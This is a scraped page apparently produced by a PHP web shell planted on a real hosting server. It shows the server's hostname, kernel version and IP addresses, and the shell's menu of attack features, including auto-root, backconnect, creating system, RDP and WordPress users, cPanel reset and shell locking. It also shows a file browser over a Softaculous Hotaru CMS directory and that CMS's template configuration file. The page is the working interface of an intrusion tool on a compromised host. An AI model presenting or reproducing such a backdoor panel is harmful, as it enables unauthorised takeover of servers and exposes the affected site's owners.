Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.221.161.43
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
hotaru /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
edit.php
12.2
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
210
B
-rw-r--r--
import.php
3.14
KB
-rw-r--r--
info.xml
2.64
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.33
KB
-rw-r--r--
install.xml
754
B
-rw-r--r--
md5
4.29
KB
-rw-r--r--
notes.txt
187
B
-rw-r--r--
settings.php
878
B
-rw-r--r--
update_pass.php
5.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings.php
<?php /* Configuration file for Hotaru CMS. */ // Paths define("BASEURL", '[[softurl]]/'); // e.g. http://www.mysite.com/ Needs trailing slash (/) // Database details define("DB_USER", '[[softdbuser]]'); // Add your own database details define("DB_PASSWORD", '[[softdbpass]]'); define("DB_NAME", '[[softdb]]'); define("DB_HOST", '[[softdbhost]]'); // You probably won't need to change this // You probably don't need to change these define("DB_PREFIX", '[[dbprefix]]'); // Database prefix, e.g. "hotaru_" define("DB_LANG", 'en'); // Database language, e.g. "en" define('DB_CHARSET', 'utf8'); // Database Character Set (UTF8 is Recommended), e.g. "utf8" define("DB_COLLATE", 'utf8_unicode_ci'); // Database Collation (UTF8 is Recommended), e.g. "utf8_unicode_ci" define("LANGUAGE_ADMIN", 'en'); define("LANGUAGE_MAIN", 'en'); ?>
Close